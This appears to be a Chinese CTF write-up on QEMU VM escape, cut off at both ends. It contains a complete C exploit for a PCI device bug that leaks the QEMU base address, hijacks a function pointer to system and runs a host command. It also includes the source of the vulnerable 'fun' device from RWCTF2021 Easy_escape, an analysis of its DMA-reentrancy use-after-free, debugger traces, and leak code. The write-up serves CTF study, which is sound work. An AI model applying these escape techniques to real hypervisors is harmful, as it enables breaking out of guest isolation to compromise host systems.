#7 0x00007ffff7a62083 in __libc_start_main (main =0x55555578d901 <main>, argc =19, argv =0x7fffffffde98, init =<optimized out>, fini =<optimized out>, rtld_fini =<optimized out>, stack_end =0x7fffffffde88) at ../csu/libc-start.c :308
#8 0x0000555555601a69 in _start ()
完整 Exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #include <sys/io.h> #define IORESOURCE_IO 0x00000100ULL typedef struct { uint16_t base; uint32_t size; uint16_t grant_base; uint32_t grant_len; bool have_ioperm; bool have_iopl; bool inited; } pio_ctx_t ; static pio_ctx_t g_pio = {0 };static int parse_io_bar (const char *bdf_or_path, int bar_idx, uint16_t *out_base, uint32_t *out_size) { char path[256 ]; if (strchr (bdf_or_path, '/' )) { snprintf (path, sizeof (path), "%s" , bdf_or_path); } else { snprintf (path, sizeof (path), "/sys/bus/pci/devices/%s/resource" , bdf_or_path); } FILE *fp = fopen(path, "r" ); if (!fp) return -1 ; int idx = 0 , chosen = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long start = 0 , end = 0 , flags = 0 ; if (sscanf (line, "%llx %llx %llx" , &start, &end, &flags) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1 ; } if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } else { if (idx <= 5 && (flags & IORESOURCE_IO)) { if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } idx++; } fclose(fp); if (chosen < 0 ) { errno = ENOENT; return -1 ; } return 0 ; } static int acquire_io_priv (uint16_t base, uint32_t size, uint16_t *grant_base, uint32_t *grant_len, bool *have_ioperm, bool *have_iopl) { uint32_t len = size; if ((unsigned )base + len > 0x10000 u) len = 0x10000 u - base; if (len == 0 ) len = 1 ; if (ioperm(base, len, 1 ) == 0 ) { *grant_base = base; *grant_len = len; *have_ioperm = true ; *have_iopl = false ; return 0 ; } if (iopl(3 ) == 0 ) { *grant_base = 0 ; *grant_len = 0 ; *have_ioperm = false ; *have_iopl = true ; return 0 ; } return -1 ; } int pio_init (const char *bdf_or_path, int bar_idx) { if (g_pio.inited) { errno = EALREADY; return -1 ; } uint16_t base = 0 ; uint32_t size = 0 ; if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0 ) return -1 ; uint16_t gbase = 0 ; uint32_t glen = 0 ; bool have_perm = false , have_iopl = false ; if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0 ) return -1 ; g_pio.base = base; g_pio.size = size; g_pio.grant_base = gbase; g_pio.grant_len = glen; g_pio.have_ioperm= have_perm; g_pio.have_iopl = have_iopl; g_pio.inited = true ; return 0 ; } void pio_fini (void ) { if (!g_pio.inited) return ; if (g_pio.have_ioperm) (void )ioperm(g_pio.grant_base, g_pio.grant_len, 0 ); if (g_pio.have_iopl) (void )iopl(0 ); memset (&g_pio, 0 , sizeof (g_pio)); } uint16_t pio_base (void ) { return g_pio.base; }uint32_t pio_size (void ) { return g_pio.size; }static inline int pio_port (uint32_t off, int width, uint16_t *port_out) { if (!g_pio.inited) { errno = EPERM; return -1 ; } if ((uint64_t )off + (uint64_t )width > g_pio.size) { errno = ERANGE; return -1 ; } uint32_t p = (uint32_t )g_pio.base + off; if (p > 0xFFFF u) { errno = ERANGE; return -1 ; } *port_out = (uint16_t )p; return 0 ; } uint8_t pio_read8 (uint32_t off) { uint16_t p; if (pio_port(off,1 ,&p)) return 0 ; return inb(p); }uint16_t pio_read16 (uint32_t off) { uint16_t p; if (pio_port(off,2 ,&p)) return 0 ; return inw(p); }uint32_t pio_read32 (uint32_t off) { uint16_t p; if (pio_port(off,4 ,&p)) return 0 ; return inl(p); }void pio_write8 (uint32_t off, uint8_t v) { uint16_t p; if (pio_port(off,1 ,&p)) return ; outb(v,p); }void pio_write16 (uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off,2 ,&p)) return ; outw(v,p); }void pio_write32 (uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off,4 ,&p)) return ; outl(v,p); }#define IORESOURCE_MEM 0x00000200ULL typedef struct { volatile uint8_t *bar; size_t size; size_t map_len; int fd; int res_idx; bool inited; } mmio_ctx_t ; static mmio_ctx_t g_mmio = {0 };static int build_paths (const char *bdf_or_path, char *resource_txt, size_t txt_sz, char *dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr (bdf_or_path, '/' )) { snprintf (resource_txt, txt_sz, "%s" , bdf_or_path); snprintf (dev_dir, dir_sz, "%s" , bdf_or_path); char *slash = strrchr (dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; } else { snprintf (resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf (dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } static int parse_mem_bar (const char *resource_txt, int bar_idx, unsigned long long *start, unsigned long long *end, int *picked_idx) { FILE *fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s=0 , e=0 , f=0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; *start = s; *end = e; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; *start = s; *end = e; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char *bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start=0 , end=0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void *map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void *mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off,1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); }uint16_t mmio_read16 (size_t off) { if (chk(off,2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); }uint32_t mmio_read32 (size_t off) { if (chk(off,4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); }uint64_t mmio_read64 (size_t off) { if (chk(off,8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); }void mmio_write8 (size_t off, uint8_t v) { if (chk(off,1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; }void mmio_write16 (size_t off, uint16_t v) { if (chk(off,2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; }void mmio_write32 (size_t off, uint32_t v) { if (chk(off,4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; }void mmio_write64 (size_t off, uint64_t v) { if (chk(off,8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; }volatile void *mmio_ptr (size_t off) { if (chk(off,1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } uint64_t ab_read (size_t off) { pio_write32(0 , off); uint64_t val_lo = pio_read32(4 ); pio_write32(0 , off + 4 ); uint64_t val_hi = pio_read32(4 ); return val_lo | val_hi << 32 ; } void ab_write (size_t off, uint64_t val) { pio_write32(0 , off); pio_write32(4 , val); pio_write32(0 , off + 4 ); pio_write32(4 , val >> 32 ); } int main () { pio_init("0000:00:04.0" , 1 ); mmio_init("0000:00:04.0" , 0 ); uint64_t qemu_base = ab_read(0x110 ) - 0x29ac8e ; printf ("[+] qemu base: %#llx\n" , qemu_base); uint64_t STRNGState_addr = ab_read(0x118 ); printf ("[+] STRNGState_addr: %#llx\n" , STRNGState_addr); const char cmd[] = "/usr/bin/gnome-calculator" ; for (int i = 0 ; i < sizeof (cmd); i += 8 ) { ab_write(i + 0x14 , *(uint64_t *)&cmd[i]); } size_t system_plt = qemu_base + 0x200D50 ; ab_write(0x110 , system_plt); ab_write(0x118 , STRNGState_addr + 0xaf8 + 0x14 ); mmio_write32(2 << 2 , 0xdeadbeef ); pio_write32(0 , 2 << 2 ); pio_write32(1 << 2 , 0xdeadbeef ); return 0 ; }
RWCTF2021 Easy_escape 环境搭建 1 2 3 4 5 6 sudo add-apt-repository -y universesudo apt updatesudo apt install -y libsnappy1v5 libusbredirparser1 libusbredirhost1
漏洞分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 #include "qemu/osdep.h" #include "qapi/error.h" #include "qemu/module.h" #include "hw/pci/pci.h" #include "hw/pci/msi.h" #include "exec/address-spaces.h" #include "exec/memory.h" #define TYPE_PCI_FUN "fun" OBJECT_DECLARE_SIMPLE_TYPE(FunState, PCI_FUN) typedef struct FunReq { uint32_t total_size; void *list [127 ]; } FunReq; typedef struct FunState { PCIDevice parent_obj; MemoryRegion mmio; uint32_t addr; uint32_t size; uint32_t idx; uint32_t result_addr; FunReq *req; AddressSpace *as; } FunState; static inline void put_result (FunState *s, uint32_t val) { uint32_t res = val; address_space_write(s->as, (hwaddr)s->result_addr, MEMTXATTRS_UNSPECIFIED, &res, 4 ); } static FunReq *create_req (uint32_t size) { if (size > 127 * 0x400 - 1 ) { return NULL ; } FunReq *req = g_malloc(0x400 ); memset (req, 0 , sizeof (FunReq)); req->total_size = size; uint32_t t = req->total_size / 0x400 + 1 ; for (uint32_t i = 0 ; i < t && i < 127 ; i++) { req->list [i] = g_malloc(0x400 ); } return req; } static void delete_req (FunReq *req) { uint32_t t = req->total_size / 0x400 + 1 ; for (uint32_t i = 0 ; i < t; i++) { g_free(req->list [i]); } g_free(req); } static void handle_data_read (FunState *s, FunReq *req, uint32_t val) { if (req->total_size && val <= 0x7E && val < (req->total_size / 0x400 + 1 )) { put_result(s, 1 ); hwaddr pa = (hwaddr)(val * 0x400 ) + s->addr; address_space_read(s->as, pa, MEMTXATTRS_UNSPECIFIED, req->list [val], 0x400 ); put_result(s, 2 ); } } static void handle_data_write (FunState *s, FunReq *req, uint32_t val) { if (req->total_size && val <= 0x7E && val < (req->total_size / 0x400 + 1 )) { put_result(s, 1 ); hwaddr pa = (hwaddr)(val * 0x400 ) + s->addr; address_space_write(s->as, pa, MEMTXATTRS_UNSPECIFIED, req->list [val], 0x400 ); put_result(s, 2 ); } } static uint64_t fun_mmio_read (void *opaque, hwaddr addr, unsigned size) { FunState *s = opaque; uint32_t val = (uint32_t )-1 ; switch (addr) { case 0x0 : val = s->size; break ; case 0x4 : val = s->addr; break ; case 0x8 : val = s->result_addr; break ; case 0xC : val = s->idx; break ; case 0x10 : if (s->req) { handle_data_write(s, s->req, s->idx); } break ; default : break ; } return val; } static void fun_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { FunState *s = opaque; switch (addr) { case 0x0 : s->size = (uint32_t )val; break ; case 0x4 : s->addr = (uint32_t )val; break ; case 0x8 : s->result_addr = (uint32_t )val; break ; case 0xC : s->idx = (uint32_t )val; break ; case 0x10 : if (s->req) { handle_data_read(s, s->req, s->idx); } break ; case 0x14 : if (!s->req) { s->req = create_req(s->size); } break ; case 0x18 : if (s->req) { delete_req(s->req); } s->req = NULL ; s->size = 0 ; break ; default : break ; } } static const MemoryRegionOps fun_mmio_ops = { .read = fun_mmio_read, .write = fun_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, .valid = { .min_access_size = 4 , .max_access_size = 4 , }, }; static void pci_fun_realize (PCIDevice *pdev, Error **errp) { FunState *s = PCI_FUN(pdev); if (!msi_init(pdev, 0 , 1 , true , false , errp)) { s->addr = 0 ; s->size = 0 ; s->idx = 0 ; s->result_addr = 0 ; s->req = NULL ; s->as = &address_space_memory; memory_region_init_io(&s->mmio, OBJECT(s), &fun_mmio_ops, s, "fun-mmio" , 0x1000 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); } } static void pci_fun_uninit (PCIDevice *pdev) { FunState *s = PCI_FUN(pdev); delete_req(s->req); s->addr = 0 ; s->size = 0 ; s->idx = 0 ; s->result_addr = 0 ; s->req = NULL ; msi_uninit(pdev); } static void fun_class_init (ObjectClass *klass, void *data) { DeviceClass *dc = DEVICE_CLASS(klass); PCIDeviceClass *k = PCI_DEVICE_CLASS(klass); k->realize = pci_fun_realize; k->exit = pci_fun_uninit; k->vendor_id = 0xCAFE ; k->device_id = 0xBABE ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; device_categorizable_set_bit(dc, DEVICE_CATEGORY_MISC); } static const TypeInfo fun_info = { .name = TYPE_PCI_FUN, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (FunState), .class_init = fun_class_init, }; static void pci_fun_register_types (void ) { type_register_static(&fun_info); } type_init(pci_fun_register_types);
设备的各个功能号含义如下:
1 2 3 4 5 6 7 8 9 10 enum FUN_OPT { SIZE = 0x00 , ADDR = 0x04 , RESULT_ADDR = 0x08 , INDEX = 0x0C , HANDLE_DATA = 0x10 , CREATE_REQ = 0x14 , DELETE_REQ = 0x18 };
0x00 SIZE:设置 size。
0x04 ADDR:DMA 的基址(来宾物理地址 ),DMA 访问从这里起按块偏移。
0x08 RESULT_ADDR:写回结果的地址(DMA 写 4 字节状态值)。
0x0C INDEX:当前操作的分块索引(0..126)。
0x10 HANDLE_DATA:
MMIO 读 触发 handle_data_write():DMA read (Guest→Host),把 GPA = ADDR + IDX*0x400 的 1KB 拷到 req->list[IDX]。
MMIO 写 触发 handle_data_read():DMA write (Host→Guest),把 req->list[IDX] 的 1KB 写回到相同 GPA。
两条路径都会向 RESULT_ADDR 依次写 1(开始)再写 2(完成),供轮询。
0x14 CREATE_REQ:若 req == NULL 则创建 req 和 (size / 0x400 + 1) 个 0x400 的 chunk。
0x18 DELETE_REQ:若 req != NULL 则释放所有 chunk 与 req 本体,并把 req=NULL,size=0。
题目是漏洞点是:DMA 可重入导致自递归 + UAF/堆破坏 。
设备的 fun_mmio_write 和 fun_mmio_read 分别能够调用到 handle_data_read 和 handle_data_write。
fun_mmio_write(0x10) → handle_data_read
fun_mmio_read(0x10) → handle_data_write
handle_data_read 和 handle_data_write 的作用分别是:
由于我们可以获取用户态指定内存页对应的物理地址,因此这里宾物理内存的 0x400 字节数据是完全可控且已知的。
而除此之外 handle_data_read 和 handle_data_write 都会调用 put_result 来设置执行状态。
put_result 会向 s->result_addr 指定的物理地址写入数据。而 result_addr 可以通过 handle_data_write(0x04) 设置,并且没有范围检查。
1 2 3 4 5 6 static inline void put_result (FunState *s, uint32_t val) { uint32_t res = val; address_space_write(s->as, (hwaddr)s->result_addr, MEMTXATTRS_UNSPECIFIED, &res, 4 ); }
这就意味着我们能够在读写来宾物理内存之前向任意物理地址写入数据 。
如果我们事先设置的 s->result_addr 是 MMIO 的物理地址偏移 0x18 的位置,则会调用到 fun_mmio_write 进而调用到 delete_req 释放整个 req。
pwndbg> bt
#0 __GI___libc_free (mem=0x7fffa8e10550) at malloc.c :3087
#1 0x0000555555a25caa in delete_req (req=0x7fffa90dcc00) at ../hw/misc/fun.c :96
#2 0x0000555555a25ec9 in fun_mmio_write (opaque=0x5555576a0390, addr=24, val=1, size=4) at ../hw/misc/fun.c :162
#3 0x0000555555c08105 in memory_region_write_accessor (mr=0x5555576a0c80, addr=24, value=0x7ffff504b9f8, size=4, shift=0, mask=4294967295, attrs=...) at ../softmmu/memory.c :491
#4 0x0000555555c0833c in access_with_adjusted_size (addr=24, value=0x7ffff504b9f8, size=4, access_size_min=4, access_size_max=4, access_fn=0x555555c08018 <memory_region_write_accessor>, mr=0x5555576a0c80, attrs=...) at ../softmmu/memory.c :552
#5 0x0000555555c0b3ef in memory_region_dispatch_write (mr=0x5555576a0c80, addr=24, data=1, op=MO_32, attrs=...) at ../softmmu/memory.c :1501
#6 0x0000555555c238fe in flatview_write_continue (fv=0x7fffa8028640, addr=4273934360, attrs=..., ptr=0x7ffff504bc74, len=4, addr1=24, l=4, mr=0x5555576a0c80) at ../softmmu/physmem.c :2759
#7 0x0000555555c23a47 in flatview_write (fv=0x7fffa8028640, addr=4273934360, attrs=..., buf=0x7ffff504bc74, len=4) at ../softmmu/physmem.c :2799
#8 0x0000555555c23dc3 in address_space_write (as=0x55555667de00 <address_space_memory>, addr=4273934360, attrs=..., buf=0x7ffff504bc74, len=4) at ../softmmu/physmem.c :2891
#9 0x0000555555c23e34 in address_space_rw (as=0x55555667de00 <address_space_memory>, addr=4273934360, attrs=..., buf=0x7ffff504bc74, len=4, is_write=true) at ../softmmu/physmem.c :2901
#10 0x0000555555a258d1 in dma_memory_rw_relaxed (as=0x55555667de00 <address_space_memory>, addr=4273934360, buf=0x7ffff504bc74, len=4, dir=DMA_DIRECTION_FROM_DEVICE) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/sysemu/dma.h :87
#11 0x0000555555a25926 in dma_memory_rw (as=0x55555667de00 <address_space_memory>, addr=4273934360, buf=0x7ffff504bc74, len=4, dir=DMA_DIRECTION_FROM_DEVICE) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/sysemu/dma.h :110
#12 0x0000555555a25996 in dma_memory_write (as=0x55555667de00 <address_space_memory>, addr=4273934360, buf=0x7ffff504bc74, len=4) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/sysemu/dma.h :122
#13 0x0000555555a25a94 in put_result (fun=0x5555576a0390, val=1) at ../hw/misc/fun.c :56
#14 0x0000555555a25c1d in handle_data_write (fun=0x5555576a0390, req=0x7fffa90dcc00, val=0) at ../hw/misc/fun.c :87
#15 0x0000555555a25d98 in fun_mmio_read (opaque=0x5555576a0390, addr=16, size=4) at ../hw/misc/fun.c :123
#16 0x0000555555c07e3c in memory_region_read_accessor (mr=0x5555576a0c80, addr=16, value=0x7ffff504be88, size=4, shift=0, mask=4294967295, attrs=...) at ../softmmu/memory.c :442
#17 0x0000555555c0833c in access_with_adjusted_size (addr=16, value=0x7ffff504be88, size=4, access_size_min=4, access_size_max=4, access_fn=0x555555c07df6 <memory_region_read_accessor>, mr=0x5555576a0c80, attrs=...) at ../softmmu/memory.c :552
#18 0x0000555555c0b02c in memory_region_dispatch_read1 (mr=0x5555576a0c80, addr=16, pval=0x7ffff504be88, size=4, attrs=...) at ../softmmu/memory.c :1420
#19 0x0000555555c0b11a in memory_region_dispatch_read (mr=0x5555576a0c80, addr=16, pval=0x7ffff504be88, op=MO_32, attrs=...) at ../softmmu/memory.c :1449
#20 0x0000555555bc8957 in io_readx (env=0x5555569448d0, iotlbentry=0x7fffa8e101f0, mmu_idx=1, addr=140006722416656, retaddr=140736229919352, access_type=MMU_DATA_LOAD, op=MO_32) at ../accel/tcg/cputlb.c :1317
#21 0x0000555555bc9df1 in load_helper (env=0x5555569448d0, addr=140006722416656, oi=33, retaddr=140736229919352, op=MO_32, code_read=false, full_load=0x555555bca160 <full_le_ldul_mmu>) at ../accel/tcg/cputlb.c :1872
#22 0x0000555555bca1aa in full_le_ldul_mmu (env=0x5555569448d0, addr=140006722416656, oi=33, retaddr=140736229919352) at ../accel/tcg/cputlb.c :1968
#23 0x0000555555bca1e2 in helper_le_ldul_mmu (env=0x5555569448d0, addr=140006722416656, oi=33, retaddr=140736229919352) at ../accel/tcg/cputlb.c :1975
#24 0x00007fffb4fdcb63 in code_gen_buffer ()
#25 0x0000555555b95552 in cpu_tb_exec (cpu=0x55555693c070, itb=0x7fffb4fdc900 <code_gen_buffer+45725907>) at ../accel/tcg/cpu-exec.c :178
#26 0x0000555555b96403 in cpu_loop_exec_tb (cpu=0x55555693c070, tb=0x7fffb4fdc900 <code_gen_buffer+45725907>, last_tb=0x7ffff504c5b8, tb_exit=0x7ffff504c5b0) at ../accel/tcg/cpu-exec.c :658
#27 0x0000555555b966fb in cpu_exec (cpu=0x55555693c070) at ../accel/tcg/cpu-exec.c :771
#28 0x0000555555bab751 in tcg_cpu_exec (cpu=0x55555693c070) at ../accel/tcg/tcg-cpus.c :243
#29 0x0000555555babcc2 in tcg_cpu_thread_fn (arg=0x55555693c070) at ../accel/tcg/tcg-cpus.c :427
#30 0x0000555555e77a29 in qemu_thread_start (args=0x55555696b890) at ../util/qemu-thread-posix.c :521
#31 0x00007ffff781b609 in start_thread (arg=<optimized out>) at pthread_create.c :477
#32 0x00007ffff773e353 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S :95
因此存在 UAF 漏洞。
漏洞利用
这里其实 2 个 chunk 也能完成利用,但是 1 个chunk 不行,因为 handle_data_* 函数要求 req->total_size 不为 0。
我们创建 req 并在 req.list 中申请三个 chunk。
在 fun_mmio_read->handle_data_write->dma_memory_write 时发生 UAF,此时读取的 req.list[0] 中的数据实际上是 tcache_pthread_struct 中的数据,因此可以泄露 req 的地址,另外 tcache_pthread_struct 之后有一个指向存放 qemu 地址的内存的指针也可以泄露。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 mmio_init("0000:00:04.0" , 0 ); uint8_t * buf = mmap(NULL , getpagesize(), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1 , 0 ); size_t buf_paddr = virt_to_phys(buf);mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(ADDR, buf_paddr); mmio_write32(INDEX, 0 ); mmio_write32(RESULT_ADDR, mmio_phys_base() + DELETE_REQ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_read32(HANDLE_DATA); qword_dump("leak req addr from tcache_perthread_struct (req->list[0])" , buf, 0x400 ); size_t req_addr = *(size_t *)(buf + 0x278 );printf ("[+] req addr: %#llx\n" , req_addr);size_t qemu_leak_addr = *(size_t *)(buf + 0x358 );printf ("[+] qemu_leak addr: %#llx\n" , qemu_leak_addr);
调试的时候需要切换到线程 3 观察 tcache 的状态:
pwndbg> threads
global_num name status pc symbol
------------ --------------- -------- -------------- ----------------------------------
1 qemu-system-x86 stopped 0x7ffff7731cb6 ppoll+166
2 qemu-system-x86 stopped 0x7ffff773795d syscall+29
3 qemu-system-x86 stopped 0x7ffff7822376 pthread_cond_wait@@GLIBC_2.3.2+534
Showing 3 of 3 threads.
pwndbg> thread 3
[Switching to thread 3 (Thread 0x7ffff504d700 (LWP 10251))]
#0 futex_wait_cancelable (private =<optimized out>, expected =0, futex_word =0x55555696b878) at ../sysdeps/nptl/futex-internal.h :183
183 ../sysdeps/nptl/futex-internal.h: No such file or directory.
pwndbg> tcachebins
tcachebins
...
0x410 [ 4] : 0x7fffa9165c00 —▸ 0x7fffa9285a00 —▸ 0x7fffa8e0fd50 —▸ 0x7fffa90dc400 ◂— 0
req 结构体的状态如下:
pwndbg> p *(FunReq*)0x7fffa9165c00
$1 = {
total_size = 2837993984,
list = {0x7fffa80008d0 "\a", 0x7fffa8e0fd50 "", 0x7fffa9285a00 "P\375\340\250\377\177", 0x0 <repeats 124 times>}
}
然后在 tcache 偏移 0x278 和 0x358 偏移分别泄露:
pwndbg> tcache
tcache is pointing to: 0x7fffa80008d0 for thread 3
{
counts = {7 <repeats 32 times>, 0, 7, 7, 0, 1, 0, 1, 1, 0, 2, 2, 0, 2, 1, 2, 0, 0, 3, 0, 1, 1, 0, 1, 2, 0, 0, 0, 1, 2, 2, 2, 4},
entries = {0x7fffa835a1a0, 0x7fffa82ac110, 0x7fffa8ffdb90, 0x7fffa80aaa30, 0x7fffa833ba00, 0x7fffa836b390, 0x7fffa8371a00, 0x7fffa8343a20, 0x7fffa8366960, 0x7fffa834f200, 0x7fffa8346740, 0x7fffa8341a30, 0x7fffa8350a00, 0x7fffa8251800, 0x7fffa83}
}
pwndbg> telescope 0x7fffa80008d0+0x278
00:0000│ 0x7fffa8000b48 —▸ 0x7fffa9165c00 —▸ 0x7fffa9285a00 —▸ 0x7fffa8e0fd50 —▸ 0x7fffa90dc400 ◂— ...
01:0008│ 0x7fffa8000b50 ◂— 0
02:0010│ 0x7fffa8000b58 ◂— 0x98c5
03:0018│ 0x7fffa8000b60 —▸ 0x7fffa800b7e0 ◂— 0xffff0000f038
04:0020│ 0x7fffa8000b68 —▸ 0x7fffa8012430 ◂— 0
05:0028│ 0x7fffa8000b70 —▸ 0x7fffa800a420 —▸ 0x7fffa80a1950 —▸ 0x7fffa804cc00 —▸ 0x7fffa80590a0 ◂— ...
06:0030│ 0x7fffa8000b78 —▸ 0x7fffa800a420 —▸ 0x7fffa80a1950 —▸ 0x7fffa804cc00 —▸ 0x7fffa80590a0 ◂— ...
07:0038│ 0x7fffa8000b80 ◂— 0
pwndbg> telescope 0x7fffa80008d0+0x358
00:0000│ 0x7fffa8000c28 —▸ 0x7fffb4fede58 (code_gen_buffer+45796907) —▸ 0x555555cc1795 (helper_lookup_tb_ptr) ◂— endbr64
01:0008│ 0x7fffa8000c30 —▸ 0x7fffefffdc00 (code_gen_buffer+1035717587) ◂— 0
02:0010│ 0x7fffa8000c38 ◂— 0x4d0e
03:0018│ 0x7fffa8000c40 ◂— 0
04:0020│ 0x7fffa8000c48 —▸ 0x7fffa800b6e8 ◂— 0x3290a8aa01
05:0028│ 0x7fffa8000c50 —▸ 0x7fffa800b760 ◂— 0
06:0030│ 0x7fffa8000c58 —▸ 0x7fffa800b768 —▸ 0x7fffa800b7b8 —▸ 0x7fffa800b790 ◂— 0
07:0038│ 0x7fffa8000c60 —▸ 0x7fffa800a430 ◂— 0x10003
pwndbg> vmmap 0x555555cc1795
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
Start End Perm Size Offset File
